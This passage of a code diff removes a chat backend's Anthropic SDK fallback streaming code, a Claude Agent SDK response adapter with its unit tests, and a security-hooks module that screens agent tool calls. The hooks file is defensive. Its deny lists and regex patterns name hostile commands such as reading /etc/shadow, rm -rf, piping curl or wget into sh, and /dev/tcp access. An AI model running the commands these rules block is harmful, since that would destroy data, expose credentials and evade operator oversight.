-    "stream_chat_completion_sdk",
-    "create_copilot_mcp_server",
-]
@@ -1,354 +0,0 @@
-"""Anthropic SDK fallback implementation.
-
-This module provides the fallback streaming implementation using the Anthropic SDK
-directly when the Claude Agent SDK is not available.
-"""
-
-import json
-import logging
-import os
-import uuid
-from collections.abc import AsyncGenerator
-from typing import Any, cast
-
-from ..config import ChatConfig
-from ..model import ChatMessage, ChatSession
-from ..response_model import (
-    StreamBaseResponse,
-    StreamError,
-    StreamFinish,
-    StreamTextDelta,
-    StreamTextEnd,
-    StreamTextStart,
-    StreamToolInputAvailable,
-    StreamToolInputStart,
-    StreamToolOutputAvailable,
-    StreamUsage,
-)
-from .tool_adapter import get_tool_definitions, get_tool_handlers
-
-logger = logging.getLogger(__name__)
-config = ChatConfig()
-
-# Maximum tool-call iterations before stopping to prevent infinite loops
-_MAX_TOOL_ITERATIONS = 10
-
-
-async def stream_with_anthropic(
-    session: ChatSession,
-    system_prompt: str,
-    text_block_id: str,
-) -> AsyncGenerator[StreamBaseResponse, None]:
-    """Stream using Anthropic SDK directly with tool calling support.
-
-    This function accumulates messages into the session for persistence.
-    The caller should NOT yield an additional StreamFinish - this function handles it.
-    """
-    import anthropic
-
-    # Only use ANTHROPIC_API_KEY - don't fall back to OpenRouter keys
-    api_key = os.getenv("ANTHROPIC_API_KEY")
-    if not api_key:
-        yield StreamError(
-            errorText="ANTHROPIC_API_KEY not configured for fallback",
-            code="config_error",
-        )
-        yield StreamFinish()
-        return
-
-    client = anthropic.AsyncAnthropic(api_key=api_key)
-    tool_definitions = get_tool_definitions()
-    tool_handlers = get_tool_handlers()
-
-    anthropic_tools = [
-        {
-            "name": t["name"],
-            "description": t["description"],
-            "input_schema": t["inputSchema"],
-        }
-        for t in tool_definitions
-    ]
-
-    anthropic_messages = _convert_session_to_anthropic(session)
-
-    if not anthropic_messages or anthropic_messages[-1]["role"] != "user":
-        anthropic_messages.append(
-            {"role": "user", "content": "Continue with the task."}
-        )
-
-    has_started_text = False
-    accumulated_text = ""
-    accumulated_tool_calls: list[dict[str, Any]] = []
-
-    for _ in range(_MAX_TOOL_ITERATIONS):
-        try:
-            async with client.messages.stream(
-                model=(
-                    config.model.split("/")[-1] if "/" in config.model else config.model
-                ),
-                max_tokens=4096,
-                system=system_prompt,
-                messages=cast(Any, anthropic_messages),
-                tools=cast(Any, anthropic_tools) if anthropic_tools else [],
-            ) as stream:
-                async for event in stream:
-                    if event.type == "content_block_start":
-                        block = event.content_block
-                        if hasattr(block, "type"):
-                            if block.type == "text" and not has_started_text:
-                                yield StreamTextStart(id=text_block_id)
-                                has_started_text = True
-                            elif block.type == "tool_use":
-                                yield StreamToolInputStart(
-                                    toolCallId=block.id, toolName=block.name
-                                )
-
-                    elif event.type == "content_block_delta":
-                        delta = event.delta
-                        if hasattr(delta, "type") and delta.type == "text_delta":
-                            accumulated_text += delta.text
-                            yield StreamTextDelta(id=text_block_id, delta=delta.text)
-
-                final_message = await stream.get_final_message()
-
-                if final_message.stop_reason == "tool_use":
-                    if has_started_text:
-                        yield StreamTextEnd(id=text_block_id)
-                        has_started_text = False
-                        text_block_id = str(uuid.uuid4())
-
-                    tool_results = []
-                    assistant_content: list[dict[str, Any]] = []
-
-                    for block in final_message.content:
-                        if block.type == "text":
-                            assistant_content.append(
-                                {"type": "text", "text": block.text}
-                            )
-                        elif block.type == "tool_use":
-                            assistant_content.append(
-                                {
-                                    "type": "tool_use",
-                                    "id": block.id,
-                                    "name": block.name,
-                                    "input": block.input,
-                                }
-                            )
-
-                            # Track tool call for session persistence
-                            accumulated_tool_calls.append(
-                                {
-                                    "id": block.id,
-                                    "type": "function",
-                                    "function": {
-                                        "name": block.name,
-                                        "arguments": json.dumps(
-                                            block.input
-                                            if isinstance(block.input, dict)
-                                            else {}
-                                        ),
-                                    },
-                                }
-                            )
-
-                            yield StreamToolInputAvailable(
-                                toolCallId=block.id,
-                                toolName=block.name,
-                                input=(
-                                    block.input if isinstance(block.input, dict) else {}
-                                ),
-                            )
-
-                            output, is_error = await _execute_tool(
-                                block.name, block.input, tool_handlers
-                            )
-
-                            yield StreamToolOutputAvailable(
-                                toolCallId=block.id,
-                                toolName=block.name,
-                                output=output,
-                                success=not is_error,
-                            )
-
-                            # Save tool result to session
-                            session.messages.append(
-                                ChatMessage(
-                                    role="tool",
-                                    content=output,
-                                    tool_call_id=block.id,
-                                )
-                            )
-
-                            tool_results.append(
-                                {
-                                    "type": "tool_result",
-                                    "tool_use_id": block.id,
-                                    "content": output,
-                                    "is_error": is_error,
-                                }
-                            )
-
-                    # Save assistant message with tool calls to session
-                    session.messages.append(
-                        ChatMessage(
-                            role="assistant",
-                            content=accumulated_text or None,
-                            tool_calls=(
-                                accumulated_tool_calls
-                                if accumulated_tool_calls
-                                else None
-                            ),
-                        )
-                    )
-                    # Reset for next iteration
-                    accumulated_text = ""
-                    accumulated_tool_calls = []
-
-                    anthropic_messages.append(
-                        {"role": "assistant", "content": assistant_content}
-                    )
-                    anthropic_messages.append({"role": "user", "content": tool_results})
-                    continue
-
-                else:
-                    if has_started_text:
-                        yield StreamTextEnd(id=text_block_id)
-
-                    # Save final assistant response to session
-                    if accumulated_text:
-                        session.messages.append(
-                            ChatMessage(role="assistant", content=accumulated_text)
-                        )
-
-                    yield StreamUsage(
-                        promptTokens=final_message.usage.input_tokens,
-                        completionTokens=final_message.usage.output_tokens,
-                        totalTokens=final_message.usage.input_tokens
-                        + final_message.usage.output_tokens,
-                    )
-                    yield StreamFinish()
-                    return
-
-        except Exception as e:
-            logger.error(f"[Anthropic Fallback] Error: {e}", exc_info=True)
-            yield StreamError(
-                errorText="An error occurred. Please try again.",
-                code="anthropic_error",
-            )
-            yield StreamFinish()
-            return
-
-    yield StreamError(errorText="Max tool iterations reached", code="max_iterations")
-    yield StreamFinish()
-
-
-def _convert_session_to_anthropic(session: ChatSession) -> list[dict[str, Any]]:
-    """Convert session messages to Anthropic format.
-
-    Handles merging consecutive same-role messages (Anthropic requires alternating roles).
-    """
-    messages: list[dict[str, Any]] = []
-
-    for msg in session.messages:
-        if msg.role == "user":
-            new_msg = {"role": "user", "content": msg.content or ""}
-        elif msg.role == "assistant":
-            content: list[dict[str, Any]] = []
-            if msg.content:
-                content.append({"type": "text", "text": msg.content})
-            if msg.tool_calls:
-                for tc in msg.tool_calls:
-                    func = tc.get("function", {})
-                    args = func.get("arguments", {})
-                    if isinstance(args, str):
-                        try:
-                            args = json.loads(args)
-                        except json.JSONDecodeError:
-                            args = {}
-                    content.append(
-                        {
-                            "type": "tool_use",
-                            "id": tc.get("id", str(uuid.uuid4())),
-                            "name": func.get("name", ""),
-                            "input": args,
-                        }
-                    )
-            if content:
-                new_msg = {"role": "assistant", "content": content}
-            else:
-                continue  # Skip empty assistant messages
-        elif msg.role == "tool":
-            new_msg = {
-                "role": "user",
-                "content": [
-                    {
-                        "type": "tool_result",
-                        "tool_use_id": msg.tool_call_id or "",
-                        "content": msg.content or "",
-                    }
-                ],
-            }
-        else:
-            continue
-
-        messages.append(new_msg)
-
-    # Merge consecutive same-role messages (Anthropic requires alternating roles)
-    return _merge_consecutive_roles(messages)
-
-
-def _merge_consecutive_roles(messages: list[dict[str, Any]]) -> list[dict[str, Any]]:
-    """Merge consecutive messages with the same role.
-
-    Anthropic API requires alternating user/assistant roles.
-    """
-    if not messages:
-        return []
-
-    merged: list[dict[str, Any]] = []
-    for msg in messages:
-        if merged and merged[-1]["role"] == msg["role"]:
-            # Merge with previous message
-            prev_content = merged[-1]["content"]
-            new_content = msg["content"]
-
-            # Normalize both to list-of-blocks form
-            if isinstance(prev_content, str):
-                prev_content = [{"type": "text", "text": prev_content}]
-            if isinstance(new_content, str):
-                new_content = [{"type": "text", "text": new_content}]
-
-            # Ensure both are lists
-            if not isinstance(prev_content, list):
-                prev_content = [prev_content]
-            if not isinstance(new_content, list):
-                new_content = [new_content]
-
-            merged[-1]["content"] = prev_content + new_content
-        else:
-            merged.append(msg)
-
-    return merged
-
-
-async def _execute_tool(
-    tool_name: str, tool_input: Any, handlers: dict[str, Any]
-) -> tuple[str, bool]:
-    """Execute a tool and return (output, is_error)."""
-    handler = handlers.get(tool_name)
-    if not handler:
-        return f"Unknown tool: {tool_name}", True
-
-    try:
-        result = await handler(tool_input)
-        # Safely extract output - handle empty or missing content
-        content = result.get("content") or []
-        if content and isinstance(content, list) and len(content) > 0:
-            first_item = content[0]
-            output = first_item.get("text", "") if isinstance(first_item, dict) else ""
-        else:
-            output = ""
-        is_error = result.get("isError", False)
-        return output, is_error
-    except Exception as e:
-        return f"Error: {str(e)}", True
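A small worked example of the alternating-roles constraint the deleted `_merge_consecutive_roles` helper enforced (plain data, no project imports):

```python
# Two consecutive user-role messages (a user turn plus a tool_result,
# which Anthropic also carries under role "user") would be rejected:
before = [
    {"role": "user", "content": "hi"},
    {"role": "user", "content": [
        {"type": "tool_result", "tool_use_id": "t1", "content": "ok"},
    ]},
]

# After merging, they become one message whose content is a single
# list of blocks, so user/assistant roles strictly alternate:
after = [
    {"role": "user", "content": [
        {"type": "text", "text": "hi"},
        {"type": "tool_result", "tool_use_id": "t1", "content": "ok"},
    ]},
]
```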
@@ -1,198 +0,0 @@
"""Response adapter for converting Claude Agent SDK messages to Vercel AI SDK format.

This module provides the adapter layer that converts streaming messages from
the Claude Agent SDK into the Vercel AI SDK UI Stream Protocol format that
the frontend expects.
"""

import json
import logging
import uuid

from claude_agent_sdk import (
    AssistantMessage,
    Message,
    ResultMessage,
    SystemMessage,
    TextBlock,
    ToolResultBlock,
    ToolUseBlock,
    UserMessage,
)

from backend.api.features.chat.response_model import (
    StreamBaseResponse,
    StreamError,
    StreamFinish,
    StreamFinishStep,
    StreamStart,
    StreamStartStep,
    StreamTextDelta,
    StreamTextEnd,
    StreamTextStart,
    StreamToolInputAvailable,
    StreamToolInputStart,
    StreamToolOutputAvailable,
)
from backend.api.features.chat.sdk.tool_adapter import (
    MCP_TOOL_PREFIX,
    pop_pending_tool_output,
)

logger = logging.getLogger(__name__)


class SDKResponseAdapter:
    """Adapter for converting Claude Agent SDK messages to Vercel AI SDK format.

    This class maintains state during a streaming session to properly track
    text blocks, tool calls, and message lifecycle.
    """

    def __init__(self, message_id: str | None = None):
        self.message_id = message_id or str(uuid.uuid4())
        self.text_block_id = str(uuid.uuid4())
        self.has_started_text = False
        self.has_ended_text = False
        self.current_tool_calls: dict[str, dict[str, str]] = {}
        self.task_id: str | None = None
        self.step_open = False

    def set_task_id(self, task_id: str) -> None:
        """Set the task ID for reconnection support."""
        self.task_id = task_id

    def convert_message(self, sdk_message: Message) -> list[StreamBaseResponse]:
        """Convert a single SDK message to Vercel AI SDK format."""
        responses: list[StreamBaseResponse] = []

        if isinstance(sdk_message, SystemMessage):
            if sdk_message.subtype == "init":
                responses.append(
                    StreamStart(messageId=self.message_id, taskId=self.task_id)
                )
                # Open the first step (matches non-SDK: StreamStart then StreamStartStep)
                responses.append(StreamStartStep())
                self.step_open = True

        elif isinstance(sdk_message, AssistantMessage):
            # After tool results, the SDK sends a new AssistantMessage for the
            # next LLM turn. Open a new step if the previous one was closed.
            if not self.step_open:
                responses.append(StreamStartStep())
                self.step_open = True

            for block in sdk_message.content:
                if isinstance(block, TextBlock):
                    if block.text:
                        self._ensure_text_started(responses)
                        responses.append(
                            StreamTextDelta(id=self.text_block_id, delta=block.text)
                        )

                elif isinstance(block, ToolUseBlock):
                    self._end_text_if_open(responses)

                    # Strip MCP prefix so frontend sees "find_block"
                    # instead of "mcp__copilot__find_block".
                    tool_name = block.name.removeprefix(MCP_TOOL_PREFIX)

                    responses.append(
                        StreamToolInputStart(toolCallId=block.id, toolName=tool_name)
                    )
                    responses.append(
                        StreamToolInputAvailable(
                            toolCallId=block.id,
                            toolName=tool_name,
                            input=block.input,
                        )
                    )
                    self.current_tool_calls[block.id] = {"name": tool_name}

        elif isinstance(sdk_message, UserMessage):
            # UserMessage carries tool results back from tool execution.
            content = sdk_message.content
            blocks = content if isinstance(content, list) else []
            for block in blocks:
                if isinstance(block, ToolResultBlock) and block.tool_use_id:
                    tool_info = self.current_tool_calls.get(block.tool_use_id, {})
                    tool_name = tool_info.get("name", "unknown")

                    # Prefer the stashed full output over the SDK's
                    # (potentially truncated) ToolResultBlock content.
                    # The SDK truncates large results, writing them to disk,
                    # which breaks frontend widget parsing.
                    output = pop_pending_tool_output(tool_name) or (
                        _extract_tool_output(block.content)
                    )

                    responses.append(
                        StreamToolOutputAvailable(
                            toolCallId=block.tool_use_id,
                            toolName=tool_name,
                            output=output,
                            success=not (block.is_error or False),
                        )
                    )

            # Close the current step after tool results — the next
            # AssistantMessage will open a new step for the continuation.
            if self.step_open:
                responses.append(StreamFinishStep())
                self.step_open = False

        elif isinstance(sdk_message, ResultMessage):
            self._end_text_if_open(responses)
            # Close the step before finishing.
            if self.step_open:
                responses.append(StreamFinishStep())
                self.step_open = False

            if sdk_message.subtype == "success":
                responses.append(StreamFinish())
            elif sdk_message.subtype in ("error", "error_during_execution"):
                error_msg = getattr(sdk_message, "result", None) or "Unknown error"
                responses.append(
                    StreamError(errorText=str(error_msg), code="sdk_error")
                )
                responses.append(StreamFinish())

        else:
            logger.debug(f"Unhandled SDK message type: {type(sdk_message).__name__}")

        return responses

    def _ensure_text_started(self, responses: list[StreamBaseResponse]) -> None:
        """Start (or restart) a text block if needed."""
        if not self.has_started_text or self.has_ended_text:
            if self.has_ended_text:
                self.text_block_id = str(uuid.uuid4())
                self.has_ended_text = False
            responses.append(StreamTextStart(id=self.text_block_id))
            self.has_started_text = True

    def _end_text_if_open(self, responses: list[StreamBaseResponse]) -> None:
        """End the current text block if one is open."""
        if self.has_started_text and not self.has_ended_text:
            responses.append(StreamTextEnd(id=self.text_block_id))
            self.has_ended_text = True


def _extract_tool_output(content: str | list[dict[str, str]] | None) -> str:
    """Extract a string output from a ToolResultBlock's content field."""
    if isinstance(content, str):
        return content
    if isinstance(content, list):
        parts = [item.get("text", "") for item in content if item.get("type") == "text"]
        if parts:
            return "".join(parts)
        try:
            return json.dumps(content)
        except (TypeError, ValueError):
            return str(content)
    if content is None:
        return ""
    try:
        return json.dumps(content)
    except (TypeError, ValueError):
        return str(content)
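
A minimal sketch of the adapter's event ordering, assuming the
claude_agent_sdk message constructors behave as in the tests that follow;
the IDs and text are illustrative.

adapter = SDKResponseAdapter(message_id="demo-msg")
adapter.set_task_id("demo-task")

events: list[StreamBaseResponse] = []
events += adapter.convert_message(SystemMessage(subtype="init", data={}))
events += adapter.convert_message(
    AssistantMessage(content=[TextBlock(text="Hello")], model="demo")
)
# Emits, in order: StreamStart, StreamStartStep, StreamTextStart,
# StreamTextDelta(delta="Hello") — the text block stays open for more deltas.
print([type(e).__name__ for e in events])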
@@ -1,366 +0,0 @@
"""Unit tests for the SDK response adapter."""

from claude_agent_sdk import (
    AssistantMessage,
    ResultMessage,
    SystemMessage,
    TextBlock,
    ToolResultBlock,
    ToolUseBlock,
    UserMessage,
)

from backend.api.features.chat.response_model import (
    StreamBaseResponse,
    StreamError,
    StreamFinish,
    StreamFinishStep,
    StreamStart,
    StreamStartStep,
    StreamTextDelta,
    StreamTextEnd,
    StreamTextStart,
    StreamToolInputAvailable,
    StreamToolInputStart,
    StreamToolOutputAvailable,
)

from .response_adapter import SDKResponseAdapter
from .tool_adapter import MCP_TOOL_PREFIX


def _adapter() -> SDKResponseAdapter:
    a = SDKResponseAdapter(message_id="msg-1")
    a.set_task_id("task-1")
    return a


# -- SystemMessage -----------------------------------------------------------


def test_system_init_emits_start_and_step():
    adapter = _adapter()
    results = adapter.convert_message(SystemMessage(subtype="init", data={}))
    assert len(results) == 2
    assert isinstance(results[0], StreamStart)
    assert results[0].messageId == "msg-1"
    assert results[0].taskId == "task-1"
    assert isinstance(results[1], StreamStartStep)


def test_system_non_init_emits_nothing():
    adapter = _adapter()
    results = adapter.convert_message(SystemMessage(subtype="other", data={}))
    assert results == []


# -- AssistantMessage with TextBlock -----------------------------------------


def test_text_block_emits_step_start_and_delta():
    adapter = _adapter()
    msg = AssistantMessage(content=[TextBlock(text="hello")], model="test")
    results = adapter.convert_message(msg)
    assert len(results) == 3
    assert isinstance(results[0], StreamStartStep)
    assert isinstance(results[1], StreamTextStart)
    assert isinstance(results[2], StreamTextDelta)
    assert results[2].delta == "hello"


def test_empty_text_block_emits_only_step():
    adapter = _adapter()
    msg = AssistantMessage(content=[TextBlock(text="")], model="test")
    results = adapter.convert_message(msg)
    # Empty text skipped, but step still opens
    assert len(results) == 1
    assert isinstance(results[0], StreamStartStep)


def test_multiple_text_deltas_reuse_block_id():
    adapter = _adapter()
    msg1 = AssistantMessage(content=[TextBlock(text="a")], model="test")
    msg2 = AssistantMessage(content=[TextBlock(text="b")], model="test")
    r1 = adapter.convert_message(msg1)
    r2 = adapter.convert_message(msg2)
    # First gets step+start+delta, second only delta (block & step already started)
    assert len(r1) == 3
    assert isinstance(r1[0], StreamStartStep)
    assert isinstance(r1[1], StreamTextStart)
    assert len(r2) == 1
    assert isinstance(r2[0], StreamTextDelta)
    assert r1[1].id == r2[0].id  # same block ID


# -- AssistantMessage with ToolUseBlock --------------------------------------


def test_tool_use_emits_input_start_and_available():
    """Tool names arrive with MCP prefix and should be stripped for the frontend."""
    adapter = _adapter()
    msg = AssistantMessage(
        content=[
            ToolUseBlock(
                id="tool-1",
                name=f"{MCP_TOOL_PREFIX}find_agent",
                input={"q": "x"},
            )
        ],
        model="test",
    )
    results = adapter.convert_message(msg)
    assert len(results) == 3
    assert isinstance(results[0], StreamStartStep)
    assert isinstance(results[1], StreamToolInputStart)
    assert results[1].toolCallId == "tool-1"
    assert results[1].toolName == "find_agent"  # prefix stripped
    assert isinstance(results[2], StreamToolInputAvailable)
    assert results[2].toolName == "find_agent"  # prefix stripped
    assert results[2].input == {"q": "x"}


def test_text_then_tool_ends_text_block():
    adapter = _adapter()
    text_msg = AssistantMessage(content=[TextBlock(text="thinking...")], model="test")
    tool_msg = AssistantMessage(
        content=[ToolUseBlock(id="t1", name=f"{MCP_TOOL_PREFIX}tool", input={})],
        model="test",
    )
    adapter.convert_message(text_msg)  # opens step + text
    results = adapter.convert_message(tool_msg)
    # Step already open, so: TextEnd, ToolInputStart, ToolInputAvailable
    assert len(results) == 3
    assert isinstance(results[0], StreamTextEnd)
    assert isinstance(results[1], StreamToolInputStart)


# -- UserMessage with ToolResultBlock ----------------------------------------


def test_tool_result_emits_output_and_finish_step():
    adapter = _adapter()
    # First register the tool call (opens step) — SDK sends prefixed name
    tool_msg = AssistantMessage(
        content=[ToolUseBlock(id="t1", name=f"{MCP_TOOL_PREFIX}find_agent", input={})],
        model="test",
    )
    adapter.convert_message(tool_msg)

    # Now send tool result
    result_msg = UserMessage(
        content=[ToolResultBlock(tool_use_id="t1", content="found 3 agents")]
    )
    results = adapter.convert_message(result_msg)
    assert len(results) == 2
    assert isinstance(results[0], StreamToolOutputAvailable)
    assert results[0].toolCallId == "t1"
    assert results[0].toolName == "find_agent"  # prefix stripped
    assert results[0].output == "found 3 agents"
    assert results[0].success is True
    assert isinstance(results[1], StreamFinishStep)


def test_tool_result_error():
    adapter = _adapter()
    adapter.convert_message(
        AssistantMessage(
            content=[
                ToolUseBlock(id="t1", name=f"{MCP_TOOL_PREFIX}run_agent", input={})
            ],
            model="test",
        )
    )
    result_msg = UserMessage(
        content=[ToolResultBlock(tool_use_id="t1", content="timeout", is_error=True)]
    )
    results = adapter.convert_message(result_msg)
    assert isinstance(results[0], StreamToolOutputAvailable)
    assert results[0].success is False
    assert isinstance(results[1], StreamFinishStep)


def test_tool_result_list_content():
    adapter = _adapter()
    adapter.convert_message(
        AssistantMessage(
            content=[ToolUseBlock(id="t1", name=f"{MCP_TOOL_PREFIX}tool", input={})],
            model="test",
        )
    )
    result_msg = UserMessage(
        content=[
            ToolResultBlock(
                tool_use_id="t1",
                content=[
                    {"type": "text", "text": "line1"},
                    {"type": "text", "text": "line2"},
                ],
            )
        ]
    )
    results = adapter.convert_message(result_msg)
    assert isinstance(results[0], StreamToolOutputAvailable)
    assert results[0].output == "line1line2"
    assert isinstance(results[1], StreamFinishStep)


def test_string_user_message_ignored():
    """A plain string UserMessage (not tool results) produces no output."""
    adapter = _adapter()
    results = adapter.convert_message(UserMessage(content="hello"))
    assert results == []


# -- ResultMessage -----------------------------------------------------------


def test_result_success_emits_finish_step_and_finish():
    adapter = _adapter()
    # Start some text first (opens step)
    adapter.convert_message(
        AssistantMessage(content=[TextBlock(text="done")], model="test")
    )
    msg = ResultMessage(
        subtype="success",
        duration_ms=100,
        duration_api_ms=50,
        is_error=False,
        num_turns=1,
        session_id="s1",
    )
    results = adapter.convert_message(msg)
    # TextEnd + FinishStep + StreamFinish
    assert len(results) == 3
    assert isinstance(results[0], StreamTextEnd)
    assert isinstance(results[1], StreamFinishStep)
    assert isinstance(results[2], StreamFinish)


def test_result_error_emits_error_and_finish():
    adapter = _adapter()
    msg = ResultMessage(
        subtype="error",
        duration_ms=100,
        duration_api_ms=50,
        is_error=True,
        num_turns=0,
        session_id="s1",
        result="API rate limited",
    )
    results = adapter.convert_message(msg)
    # No step was open, so no FinishStep — just Error + Finish
    assert len(results) == 2
    assert isinstance(results[0], StreamError)
    assert "API rate limited" in results[0].errorText
    assert isinstance(results[1], StreamFinish)


# -- Text after tools (new block ID) ----------------------------------------


def test_text_after_tool_gets_new_block_id():
    adapter = _adapter()
    # Text -> Tool -> ToolResult -> Text should get a new text block ID and step
    adapter.convert_message(
        AssistantMessage(content=[TextBlock(text="before")], model="test")
    )
    adapter.convert_message(
        AssistantMessage(
            content=[ToolUseBlock(id="t1", name=f"{MCP_TOOL_PREFIX}tool", input={})],
            model="test",
        )
    )
    # Send tool result (closes step)
    adapter.convert_message(
        UserMessage(content=[ToolResultBlock(tool_use_id="t1", content="ok")])
    )
    results = adapter.convert_message(
        AssistantMessage(content=[TextBlock(text="after")], model="test")
    )
    # Should get StreamStartStep (new step) + StreamTextStart (new block) + StreamTextDelta
    assert len(results) == 3
    assert isinstance(results[0], StreamStartStep)
    assert isinstance(results[1], StreamTextStart)
    assert isinstance(results[2], StreamTextDelta)
    assert results[2].delta == "after"


# -- Full conversation flow --------------------------------------------------


def test_full_conversation_flow():
    """Simulate a complete conversation: init -> text -> tool -> result -> text -> finish."""
    adapter = _adapter()
    all_responses: list[StreamBaseResponse] = []

    # 1. Init
    all_responses.extend(
        adapter.convert_message(SystemMessage(subtype="init", data={}))
    )
    # 2. Assistant text
    all_responses.extend(
        adapter.convert_message(
            AssistantMessage(content=[TextBlock(text="Let me search")], model="test")
        )
    )
    # 3. Tool use
    all_responses.extend(
        adapter.convert_message(
            AssistantMessage(
                content=[
                    ToolUseBlock(
                        id="t1",
                        name=f"{MCP_TOOL_PREFIX}find_agent",
                        input={"query": "email"},
                    )
                ],
                model="test",
            )
        )
    )
    # 4. Tool result
    all_responses.extend(
        adapter.convert_message(
            UserMessage(
                content=[ToolResultBlock(tool_use_id="t1", content="Found 2 agents")]
            )
        )
    )
    # 5. More text
    all_responses.extend(
        adapter.convert_message(
            AssistantMessage(content=[TextBlock(text="I found 2")], model="test")
        )
    )
    # 6. Result
    all_responses.extend(
        adapter.convert_message(
            ResultMessage(
                subtype="success",
                duration_ms=500,
                duration_api_ms=400,
                is_error=False,
                num_turns=2,
                session_id="s1",
            )
        )
    )

    types = [type(r).__name__ for r in all_responses]
    assert types == [
        "StreamStart",
        "StreamStartStep",  # step 1: text + tool call
        "StreamTextStart",
        "StreamTextDelta",  # "Let me search"
        "StreamTextEnd",  # closed before tool
        "StreamToolInputStart",
        "StreamToolInputAvailable",
        "StreamToolOutputAvailable",  # tool result
        "StreamFinishStep",  # step 1 closed after tool result
        "StreamStartStep",  # step 2: continuation text
        "StreamTextStart",  # new block after tool
        "StreamTextDelta",  # "I found 2"
        "StreamTextEnd",  # closed by result
        "StreamFinishStep",  # step 2 closed
        "StreamFinish",
    ]
@@ -1,393 +0,0 @@
"""Security hooks for Claude Agent SDK integration.

This module provides security hooks that validate tool calls before execution,
ensuring multi-user isolation and preventing unauthorized operations.
"""

import json
import logging
import os
import re
import shlex
from typing import Any, cast

from backend.api.features.chat.sdk.tool_adapter import MCP_TOOL_PREFIX

logger = logging.getLogger(__name__)

# Tools that are blocked entirely (CLI/system access)
BLOCKED_TOOLS = {
    "bash",
    "shell",
    "exec",
    "terminal",
    "command",
}

# Safe read-only commands allowed in the sandboxed Bash tool.
# These are data-processing / inspection utilities — no writes, no network.
ALLOWED_BASH_COMMANDS = {
    # JSON / structured data
    "jq",
    # Text processing
    "grep",
    "egrep",
    "fgrep",
    "rg",
    "head",
    "tail",
    "cat",
    "wc",
    "sort",
    "uniq",
    "cut",
    "tr",
    "sed",
    "awk",
    "column",
    "fold",
    "fmt",
    "nl",
    "paste",
    "rev",
    # File inspection (read-only)
    "find",
    "ls",
    "file",
    "stat",
    "du",
    "tree",
    "basename",
    "dirname",
    "realpath",
    # Utilities
    "echo",
    "printf",
    "date",
    "true",
    "false",
    "xargs",
    "tee",
    # Comparison / encoding
    "diff",
    "comm",
    "base64",
    "md5sum",
    "sha256sum",
}

# Tools allowed only when their path argument stays within the SDK workspace.
# The SDK uses these to handle oversized tool results (writes to tool-results/
# files, then reads them back) and for workspace file operations.
WORKSPACE_SCOPED_TOOLS = {"Read", "Write", "Edit", "Glob", "Grep"}

# Tools that get sandboxed Bash validation (command allowlist + workspace paths).
SANDBOXED_BASH_TOOLS = {"Bash"}

# Dangerous patterns in tool inputs
DANGEROUS_PATTERNS = [
    r"sudo",
    r"rm\s+-rf",
    r"dd\s+if=",
    r"/etc/passwd",
    r"/etc/shadow",
    r"chmod\s+777",
    r"curl\s+.*\|.*sh",
    r"wget\s+.*\|.*sh",
    r"eval\s*\(",
    r"exec\s*\(",
    r"__import__",
    r"os\.system",
    r"subprocess",
]


def _deny(reason: str) -> dict[str, Any]:
    """Return a hook denial response."""
    return {
        "hookSpecificOutput": {
            "hookEventName": "PreToolUse",
            "permissionDecision": "deny",
            "permissionDecisionReason": reason,
        }
    }


def _validate_workspace_path(
    tool_name: str, tool_input: dict[str, Any], sdk_cwd: str | None
) -> dict[str, Any]:
    """Validate that a workspace-scoped tool only accesses allowed paths.

    Allowed directories:
    - The SDK working directory (``/tmp/copilot-<session>/``)
    - The SDK tool-results directory (``~/.claude/projects/…/tool-results/``)
    """
    path = tool_input.get("file_path") or tool_input.get("path") or ""
    if not path:
        # Glob/Grep without a path default to cwd which is already sandboxed
        return {}

    resolved = os.path.normpath(os.path.expanduser(path))

    # Allow access within the SDK working directory
    if sdk_cwd:
        norm_cwd = os.path.normpath(sdk_cwd)
        if resolved.startswith(norm_cwd + os.sep) or resolved == norm_cwd:
            return {}

    # Allow access to ~/.claude/projects/*/tool-results/ (big tool results)
    claude_dir = os.path.normpath(os.path.expanduser("~/.claude/projects"))
    if resolved.startswith(claude_dir + os.sep) and "tool-results" in resolved:
        return {}

    logger.warning(
        f"Blocked {tool_name} outside workspace: {path} (resolved={resolved})"
    )
    return _deny(
        f"Tool '{tool_name}' can only access files within the workspace directory."
    )


def _validate_bash_command(
    tool_input: dict[str, Any], sdk_cwd: str | None
) -> dict[str, Any]:
    """Validate a Bash command against the allowlist of safe commands.

    Only read-only data-processing commands are allowed (jq, grep, head, etc.).
    Blocks command substitution, output redirection, and disallowed executables.

    Uses ``shlex.split`` to properly handle quoted strings (e.g. jq filters
    containing ``|`` won't be mistaken for shell pipes).
    """
    command = tool_input.get("command", "")
    if not command or not isinstance(command, str):
        return _deny("Bash command is empty.")

    # Block command substitution — can smuggle arbitrary commands
    if "$(" in command or "`" in command:
        return _deny("Command substitution ($() or ``) is not allowed in Bash.")

    # Block output redirection — Bash should be read-only
    if re.search(r"(?<!\d)>{1,2}\s", command):
        return _deny("Output redirection (> or >>) is not allowed in Bash.")

    # Block /dev/ access (e.g., /dev/tcp for network)
    if "/dev/" in command:
        return _deny("Access to /dev/ is not allowed in Bash.")

    # Tokenize with shlex (respects quotes), then extract command names.
    # shlex preserves shell operators like | ; && || as separate tokens.
    try:
        tokens = shlex.split(command)
    except ValueError:
        return _deny("Malformed command (unmatched quotes).")

    # Walk tokens: the first non-assignment token after a pipe/separator is a command.
    expect_command = True
    for token in tokens:
        if token in ("|", "||", "&&", ";"):
            expect_command = True
            continue
        if expect_command:
            # Skip env var assignments (VAR=value)
            if "=" in token and not token.startswith("-"):
                continue
            cmd_name = os.path.basename(token)
            if cmd_name not in ALLOWED_BASH_COMMANDS:
                allowed = ", ".join(sorted(ALLOWED_BASH_COMMANDS))
                logger.warning(f"Blocked Bash command: {cmd_name}")
                return _deny(
                    f"Command '{cmd_name}' is not allowed. "
                    f"Allowed commands: {allowed}"
                )
            expect_command = False

    # Validate absolute file paths stay within workspace
    if sdk_cwd:
        norm_cwd = os.path.normpath(sdk_cwd)
        claude_dir = os.path.normpath(os.path.expanduser("~/.claude/projects"))
        for token in tokens:
            if not token.startswith("/"):
                continue
            resolved = os.path.normpath(token)
            if resolved.startswith(norm_cwd + os.sep) or resolved == norm_cwd:
                continue
            if resolved.startswith(claude_dir + os.sep) and "tool-results" in resolved:
                continue
            logger.warning(f"Blocked Bash path outside workspace: {token}")
            return _deny(
                f"Bash can only access files within the workspace directory. "
                f"Path '{token}' is outside the workspace."
            )

    return {}


def _validate_tool_access(
    tool_name: str, tool_input: dict[str, Any], sdk_cwd: str | None = None
) -> dict[str, Any]:
    """Validate that a tool call is allowed.

    Returns:
        Empty dict to allow, or dict with hookSpecificOutput to deny
    """
    # Block forbidden tools
    if tool_name in BLOCKED_TOOLS:
        logger.warning(f"Blocked tool access attempt: {tool_name}")
